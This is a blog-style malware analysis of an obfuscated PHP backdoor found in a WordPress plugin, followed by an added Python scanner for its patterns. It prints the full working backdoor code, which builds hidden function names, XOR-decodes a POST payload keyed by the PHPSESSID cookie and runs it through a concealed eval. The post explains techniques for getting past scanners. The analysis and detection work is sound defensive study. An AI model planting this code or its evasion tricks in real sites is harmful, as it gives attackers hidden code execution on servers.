
Introduction

Last week was busy for exploit attempts! In fact I spent a full 5 days cleaning up PHP files and finding new hacking attempts.

This specific exploit popped up just this week; yet again it's from a WordPress site, specifically code entered via a plugin. It employs a different coding style, a mix of techniques (see the article in the references below for some in-depth analysis); it's easy to spot by the human eye but tricky to pick up with detection programs.

It's yet another way to code an exploit that, unlike most, does not use the keyword "eval" in plain text.

Synopsis

If you're not going to read the full article, here is a summary (please spend the few minutes reading everything; you will learn something).

  • Exploit coding techniques are changing weekly.
  • eval(), the usual entry point for running the payload, is hidden.
  • The payload arrives base64 encoded in a POST variable and is XOR decoded with a key taken from a cookie.
  • Function calls are made through variables holding the function names.

First, the code, neatened up to show functions and declarations clearly:

<?php
$O="\x65";  // 'e'
$_="\x62\x61\x73$O\x36\x34\x5f\x64$O\x63\x6f\x64$O"; // "base64_decode"
$_1=$_("YXJyYXlfbWFw"); // base64_decode("YXJyYXlfbWFw") == "array_map"
$S=$_1($_,array("Y2hy","b3Jk","c3Vic3Ry",
    "c3RyX3JlcGVhdA","c3RybGVu","am9pbg",
    "YXJyYXlfbWFw","c3RyX3NwbGl0","emxpYl9kZWNvZGU",
    "ZXZhbCgiJGMiKQ","cHJlZ19yZXBsYWNl","c3RyaXBzbGFzaGVz",
    "Ly4qL2U","X1BPU1Q","X0NPT0tJRQ","UEhQU0VTU0lE","ZXhpdA","ZQ","KCk7",));
// $S is now a list of decoded PHP function names and keywords (see the dump below)
function x($c,$k)
{
    global $S;
    return $S[0]($S[1]($c)^$S[1]($k));
    // i.e. chr(ord($c) ^ ord($k)): XOR one byte of data with one byte of key
}
 
function d($d,$k)
{
    global $_,$S;
    $i=2;
    $X=$_($d); // base64_decode($d)
    // $i++ walks the table: [2] substr, [3] str_repeat, [4] strlen (used three times)
    // $y = substr(str_repeat($k, 1 + (strlen($X) / strlen($k))), 0, strlen($X));
    // i.e. the key repeated and cut to the length of the decoded data
    $y=$S[$i++]($S[$i++]($k,1+($S[$i]($X)/$S[$i]($k))),0,$S[$i++]($X));
    // [5] join, [6] array_map, [7] str_split (used twice)
    // return join("", array_map("x", str_split($X), str_split($y)));
    // i.e. a repeating-key XOR of the decoded data with $k
    return $S[$i++]("",$S[$i++]("x",$S[$i]($X),$S[$i++]($y)));
}
 
function e($c)
{
    global $S;
    // preg_replace("/.*/e", stripslashes('eval("$c")'), "");
    // the /e modifier evaluates the replacement as PHP code, so this is a hidden eval($c)
    return $S[10]($S[12],$S[11]($S[9]),"");
}
// e(d($_POST['q'], $_COOKIE['PHPSESSID'])): the POST payload is base64 decoded,
// XOR'd with the PHPSESSID cookie value as the key, and then evaluated
$S[17](d(${$S[13]}["\x71"],${$S[14]}[$S[15]]));
// e("exit" . "();"): evaluates exit() so the script stops once the payload has run
$S[17]($S[16].$S[18]);
?>
A dump of the variables gives a clear clue as to what the code executes:
    [O] => e
    [_] => base64_decode
    [_1] => array_map
Array
(
    [0] => chr
    [1] => ord
    [2] => substr
    [3] => str_repeat
    [4] => strlen
    [5] => join
    [6] => array_map
    [7] => str_split
    [8] => zlib_decode
    [9] => eval("$c")
    [10] => preg_replace
    [11] => stripslashes
    [12] => /.*/e
    [13] => _POST
    [14] => _COOKIE
    [15] => PHPSESSID
    [16] => exit
    [17] => e
    [18] => ();
)
The techniques here differ from many exploits: an array of function names, all hidden, is assembled and the functions are then called through array references. The eval call is hidden as well, so most scanning attempts fail immediately, and searches for long base64-encoded strings also fail because the encoded pieces are kept short and split up to get past current scanners.
Like many exploits the code uses POST variables to complete its actions. By replacing this code with a shell that stores the calls used by the exploiters I have determined it's used as a simple mailer. However its loading capability allows any code to be executed.
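A scanner for exactly this obfuscation pattern, written here as an added example (it is not the author's code and not part of the article): it resolves \xNN-escaped literals, decodes the short base64 tokens and reports those that turn into dangerous PHP names such as eval, preg_replace and _POST, and lists variable function calls such as $S[17](...). The embedded PHP snippet is a constructed, trimmed copy of the sample above; the SUSPICIOUS name list is my own choice.

```python
import base64, re

# Constructed sample: the article's obfuscated snippet, trimmed to the lines that carry
# the literals (a real scan would feed in the whole file).
SAMPLE_PHP = r'''<?php
$O="\x65";
$_="\x62\x61\x73$O\x36\x34\x5f\x64$O\x63\x6f\x64$O";
$_1=$_("YXJyYXlfbWFw");
$S=$_1($_,array("Y2hy","b3Jk","c3Vic3Ry","c3RyX3JlcGVhdA","c3RybGVu","am9pbg",
  "YXJyYXlfbWFw","c3RyX3NwbGl0","emxpYl9kZWNvZGU","ZXZhbCgiJGMiKQ","cHJlZ19yZXBsYWNl",
  "c3RyaXBzbGFzaGVz","Ly4qL2U","X1BPU1Q","X0NPT0tJRQ","UEhQU0VTU0lE","ZXhpdA","ZQ","KCk7",));
$S[17](d(${$S[13]}["\x71"],${$S[14]}[$S[15]]));
?>'''
# Names a plugin file has no honest reason to assemble from escapes or base64 (assumed list).
SUSPICIOUS = {"eval", "base64_decode", "preg_replace", "zlib_decode", "stripslashes",
              "array_map", "chr", "ord", "_POST", "_COOKIE", "_REQUEST", "_GET"}
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"((?:[^"\\]|\\.)*)";')   # $var="...";
B64_RE = re.compile(r'"([A-Za-z0-9+/]{2,}={0,2})"')              # "b64token"
VARCALL_RE = re.compile(r'\$\w+(?:\[[^\]]+\])?\(')               # $f( or $arr[idx](

def decode_php_string(raw, env):
    r"""Resolve \xNN escapes and simple $var interpolation in a double-quoted PHP literal."""
    def sub(m):
        if m.group(1) is not None:              # \xNN escape
            return chr(int(m.group(1), 16))
        return env.get(m.group(2), "")          # earlier-assigned variable, e.g. $O
    return re.sub(r'\\x([0-9a-fA-F]{2})|\$([A-Za-z_]\w*)', sub, raw)

def decode_b64_token(tok):
    """Decode a base64 token; the sample strips '=' padding, so restore it first."""
    try:
        return base64.b64decode(tok + "=" * (-len(tok) % 4), validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None

def is_hot(decoded):  # known-dangerous names, anything containing eval, or the /e modifier
    return decoded in SUSPICIOUS or "eval" in decoded or decoded.endswith("/e")

def scan(php_source):
    """Return (kind, literal, decoded) findings for the three obfuscation patterns."""
    findings, env = [], {}
    for var, raw in ASSIGN_RE.findall(php_source):
        decoded = decode_php_string(raw, env)
        env[var] = decoded                      # so "$O" resolves inside later literals
        if ("\\x" in raw or "$" in raw) and is_hot(decoded):
            findings.append(("hex-escaped literal", raw, decoded))
    for tok in B64_RE.findall(php_source):
        decoded = decode_b64_token(tok)
        if decoded is not None and is_hot(decoded):
            findings.append(("base64 literal", tok, decoded))
    findings += [("variable function call", c, c) for c in VARCALL_RE.findall(php_source)]
    return findings
```

Running scan(SAMPLE_PHP) reports the hex-built base64_decode, the base64 tokens for eval("$c"), /.*/e, preg_replace, _POST and _COOKIE among others, and the three variable calls; a plain plugin file should produce an empty list.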

References